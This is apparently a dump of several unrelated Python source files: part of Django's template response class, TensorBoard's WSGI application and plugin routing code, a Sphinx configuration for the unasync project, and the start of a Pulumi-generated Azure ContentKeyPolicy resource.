invoke the callback immediately.
"""
if self._is_rendered:
callback(self)
else:
self._post_render_callbacks.append(callback)
# @profile(immediate=True, sort=['tottime'], dirs=True)
def render(self):
"""Render (thereby finalizing) the content of the response.
If the content has already been rendered, this is a no-op.
Return the baked response instance.
"""
retval = self
if not self._is_rendered:
self.content = self.rendered_content
for post_callback in self._post_render_callbacks:
newretval = post_callback(retval)
if newretval is not None:
retval = newretval
return retval
@property
def is_rendered(self):
return self._is_rendered
def __iter__(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be iterated over.'
)
return super().__iter__()
@property
def content(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be accessed.'
)
return super().content
@content.setter
def content(self, value):
"""Set the content for the response."""
HttpResponse.content.fset(self, value)
self._is_rendered = True
class TemplateResponse(SimpleTemplateResponse):
rendering_attrs = SimpleTemplateResponse.rendering_attrs + ['_request']
def __init__(self, request, template, context=None, content_type=None,
status=None, charset=None, using=None):
super().__init__(template, context, content_type, status, charset, using)
self._request = request
|
py | 1a32f4163314a06a1813d797a03670a0499d4229 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import sqlite3
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import parse as urlparse # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend.event_processing import db_import_multiplexer
from tensorboard.backend.event_processing import data_provider as event_data_provider # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = '/data'
PLUGIN_PREFIX = '/plugin'
PLUGINS_LISTING_ROUTE = '/plugins_listing'
PLUGIN_ENTRY_ROUTE = '/plugin_entry.html'
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
logger = tb_logging.get_logger()
def tensor_size_guidance_from_flags(flags):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
if not flags or not flags.samples_per_plugin:
return tensor_size_guidance
for token in flags.samples_per_plugin.split(','):
k, v = token.strip().split('=')
tensor_size_guidance[k] = int(v)
return tensor_size_guidance
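# Illustrative sketch (not part of TensorBoard itself): the flag parsed above is a
# comma-separated list of plugin_name=count pairs, so a hypothetical
#   flags.samples_per_plugin = "scalars=500,images=0"
# yields the defaults in DEFAULT_TENSOR_SIZE_GUIDANCE with 'scalars' overridden to
# 500 and 'images' overridden to 0.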
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
if flags.db_import:
# DB import mode.
db_uri = flags.db
# Create a temporary DB file if we weren't given one.
if not db_uri:
tmpdir = tempfile.mkdtemp(prefix='tbimport')
atexit.register(shutil.rmtree, tmpdir)
db_uri = 'sqlite:%s/tmp.sqlite' % tmpdir
db_connection_provider = create_sqlite_connection_provider(db_uri)
logger.info('Importing logdir into DB at %s', db_uri)
multiplexer = db_import_multiplexer.DbImportMultiplexer(
db_uri=db_uri,
db_connection_provider=db_connection_provider,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads)
elif flags.db:
# DB read-only mode, never load event logs.
reload_interval = -1
db_connection_provider = create_sqlite_connection_provider(flags.db)
multiplexer = _DbModeMultiplexer(flags.db, db_connection_provider)
else:
# Regular logdir loading mode.
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance_from_flags(flags),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags))
if flags.generic_data != 'false':
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugin loader instances.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
:type plugins: list[base_plugin.TBLoader]
"""
db_uri = None
db_connection_provider = None
if isinstance(
deprecated_multiplexer,
(db_import_multiplexer.DbImportMultiplexer, _DbModeMultiplexer)):
db_uri = deprecated_multiplexer.db_uri
db_connection_provider = deprecated_multiplexer.db_connection_provider
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
db_connection_provider=db_connection_provider,
db_uri=db_uri,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
window_title=flags.window_title)
tbplugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
plugin = loader.load(context)
if plugin is None:
continue
tbplugins.append(plugin)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(tbplugins, flags.path_prefix)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(self, plugins, path_prefix=''):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
      path_prefix: An optional prefix of the URL path under which the app is
        served (e.g. '/tensorboard'); empty when serving from the root.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
if self._path_prefix.endswith('/'):
# Should have been fixed by `fix_flags`.
raise ValueError('Trailing slash in path prefix: %r' % self._path_prefix)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError('Plugin %s has invalid name %r' % (plugin,
plugin.plugin_name))
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
raise
logger.warn('Plugin %s failed. Exception: %s',
plugin.plugin_name, str(e))
continue
for route, app in plugin_apps.items():
if not route.startswith('/'):
raise ValueError('Plugin named %r handles invalid route %r: '
'route does not start with a slash' %
(plugin.plugin_name, route))
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
)
if path.endswith('/*'):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if '*' in path:
# note we re-add the removed * in the format string
raise ValueError('Plugin %r handles invalid route \'%s*\': Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
unordered_prefix_routes[path] = app
else:
if '*' in path:
raise ValueError('Plugin %r handles invalid route %r: Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True))
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get('name')
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
# Technically is not possible as plugin names are unique and is checked
# by the check on __init__.
reason = (
'Plugin invariant error: multiple plugins with name '
'{name} found: {list}'
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, 'Plugin is not module loadable', 'text/plain', code=400)
# non-self origin is blocked by CSP but this is a good invariant checking.
if urlparse.urlparse(module_path).netloc:
raise ValueError('Expected es_module_path to be non-absolute path')
module_json = json.dumps('.' + module_path)
script_content = 'import({}).then((m) => void m.render());'.format(
module_json)
digest = hashlib.sha256(script_content.encode('utf-8')).digest()
script_sha = base64.b64encode(digest).decode('ascii')
html = textwrap.dedent("""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
""").format(name=name, script_content=script_content)
return http_util.Respond(
request,
html,
'text/html',
csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
for plugin in self._plugins:
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
'Plugin listing: is_active() for %s took %0.3f seconds',
plugin.plugin_name, elapsed)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
'disable_reload': plugin_metadata.disable_reload,
'enabled': is_active,
# loading_mechanism set below
'remove_dom': plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata['tab_name'] = plugin_metadata.tab_name
else:
output_metadata['tab_name'] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
if element_name is not None and es_module_handler is not None:
logger.error(
'Plugin %r declared as both legacy and iframed; skipping',
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
'type': 'CUSTOM_ELEMENT',
'element_name': element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
'type': 'IFRAME',
'module_path': ''.join([
request.script_root, DATA_PREFIX, PLUGIN_PREFIX, '/',
plugin.plugin_name, es_module_handler,
]),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
'type': 'NONE',
}
output_metadata['loading_mechanism'] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, 'application/json')
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](environ, start_response)
logger.warn('path %s not found, sending 404', clean_path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)(
environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
    logdir_spec: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir_spec.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon. If the spec looks like
# [a-zA-z]:\foo then we assume its a Windows path and not a single letter
# group
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/' and not os.path.splitdrive(specification)[0]):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
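# Illustrative sketch (not from the original file): for a hypothetical flag value
#   --logdir_spec=train:/tmp/logs/train,/tmp/logs/eval
# the function above returns roughly
#   {'/tmp/logs/train': 'train', '/tmp/logs/eval': None}
# (paths are expanded with realpath first), where None means the run is named
# after its path.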
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval,
reload_task):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError('load_interval is negative: %d' % load_interval)
def _reload():
while True:
start = time.time()
logger.info('TensorBoard reload process beginning')
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logger.info('TensorBoard done reloading. Load took %0.3f secs', duration)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == 'process':
logger.info('Launching reload in a child process')
import multiprocessing
process = multiprocessing.Process(target=_reload, name='Reloader')
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ('thread', 'auto'):
logger.info('Launching reload in a daemon thread')
thread = threading.Thread(target=_reload, name='Reloader')
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == 'blocking':
if load_interval != 0:
raise ValueError('blocking reload only allowed with load_interval=0')
_reload()
else:
raise ValueError('unrecognized reload_task: %s' % reload_task)
def create_sqlite_connection_provider(db_uri):
"""Returns function that returns SQLite Connection objects.
Args:
db_uri: A string URI expressing the DB file, e.g. "sqlite:~/tb.db".
Returns:
A function that returns a new PEP-249 DB Connection, which must be closed,
each time it is called.
Raises:
ValueError: If db_uri is not a valid sqlite file URI.
"""
uri = urlparse.urlparse(db_uri)
if uri.scheme != 'sqlite':
raise ValueError('Only sqlite DB URIs are supported: ' + db_uri)
if uri.netloc:
raise ValueError('Can not connect to SQLite over network: ' + db_uri)
if uri.path == ':memory:':
raise ValueError('Memory mode SQLite not supported: ' + db_uri)
path = os.path.expanduser(uri.path)
params = _get_connect_params(uri.query)
# TODO(@jart): Add thread-local pooling.
return lambda: sqlite3.connect(path, **params)
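# Illustrative sketch (assumed usage, not from this file): the provider is a
# zero-argument callable, so callers open and close a fresh connection per use.
#   provider = create_sqlite_connection_provider('sqlite:~/tb.db')
#   conn = provider()
#   try:
#       conn.execute('SELECT 1')
#   finally:
#       conn.close()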
def _get_connect_params(query):
params = urlparse.parse_qs(query)
if any(len(v) > 2 for v in params.values()):
raise ValueError('DB URI params list has duplicate keys: ' + query)
return {k: json.loads(v[0]) for k, v in params.items()}
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != '/' and path.endswith('/'):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
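# Illustrative sketch (not part of TensorBoard itself): with a hypothetical
#   flags.reload_multifile = True and flags.reload_multifile_inactive_secs = 4000
# the returned predicate treats any event file whose last-load timestamp falls
# within the past 4000 seconds as still active.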
class _DbModeMultiplexer(event_multiplexer.EventMultiplexer):
"""Shim EventMultiplexer to use when in read-only DB mode.
In read-only DB mode, the EventMultiplexer is nonfunctional - there is no
logdir to reload, and the data is all exposed via SQL. This class represents
the do-nothing EventMultiplexer for that purpose, which serves only as a
conduit for DB-related parameters.
The load APIs raise exceptions if called, and the read APIs always
return empty results.
"""
def __init__(self, db_uri, db_connection_provider):
"""Constructor for `_DbModeMultiplexer`.
Args:
db_uri: A URI to the database file in use.
db_connection_provider: Provider function for creating a DB connection.
"""
logger.info('_DbModeMultiplexer initializing for %s', db_uri)
super(_DbModeMultiplexer, self).__init__()
self.db_uri = db_uri
self.db_connection_provider = db_connection_provider
logger.info('_DbModeMultiplexer done initializing')
def AddRun(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def AddRunsFromDirectory(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def Reload(self):
"""Unsupported."""
raise NotImplementedError()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
:type plugin_spec:
Type[base_plugin.TBPlugin] | Type[base_plugin.TBLoader] |
base_plugin.TBLoader
:rtype: base_plugin.TBLoader
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
py | 1a32f4235cf9e1e025664ee5c7d24b187c5d26d3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Documentation build configuration file, created by
# sphinx-quickstart on Sat Jan 21 19:11:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# So autodoc can import our package
sys.path.insert(0, os.path.abspath("../.."))
# Warn about all references to unknown targets
nitpicky = True
# Except for these ones, which we expect to point to unknown targets:
nitpick_ignore = [
# Format is ("sphinx reference type", "string"), e.g.:
("py:obj", "bytes-like")
]
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.napoleon",
"sphinxcontrib_trio",
]
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"trio": ("https://trio.readthedocs.io/en/stable", None),
}
autodoc_member_order = "bysource"
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "unasync"
copyright = "The unasync authors"
author = "The unasync authors"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import unasync
version = unasync.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# The default language for :: blocks
highlight_language = "python3"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
# We have to set this ourselves, not only because it's useful for local
# testing, but also because if we don't then RTD will throw away our
# html_theme_options.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# default is 2
# show deeper nesting in the RTD theme's sidebar TOC
# https://stackoverflow.com/questions/27669376/
# I'm not 100% sure this actually does anything with our current
# versions/settings...
"navigation_depth": 4,
"logo_only": True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "unasyncdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [(master_doc, "unasync.tex", "unasync Documentation", author, "manual")]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "unasync", "unasync Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"unasync",
"unasync Documentation",
author,
"unasync",
"The async transformation code.",
"Miscellaneous",
)
]
|
py | 1a32f4913fb10302cdbf8dc6970d5524842e9f8b | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ContentKeyPolicyArgs', 'ContentKeyPolicy']
@pulumi.input_type
class ContentKeyPolicyArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
options: pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]],
resource_group_name: pulumi.Input[str],
content_key_policy_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ContentKeyPolicy resource.
:param pulumi.Input[str] account_name: The Media Services account name.
:param pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]] options: The Key Policy options.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the Azure subscription.
:param pulumi.Input[str] content_key_policy_name: The Content Key Policy name.
:param pulumi.Input[str] description: A description for the Policy.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "options", options)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if content_key_policy_name is not None:
pulumi.set(__self__, "content_key_policy_name", content_key_policy_name)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The Media Services account name.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def options(self) -> pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]]:
"""
The Key Policy options.
"""
return pulumi.get(self, "options")
@options.setter
def options(self, value: pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]]):
pulumi.set(self, "options", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group within the Azure subscription.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="contentKeyPolicyName")
def content_key_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The Content Key Policy name.
"""
return pulumi.get(self, "content_key_policy_name")
@content_key_policy_name.setter
def content_key_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_key_policy_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for the Policy.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
class ContentKeyPolicy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
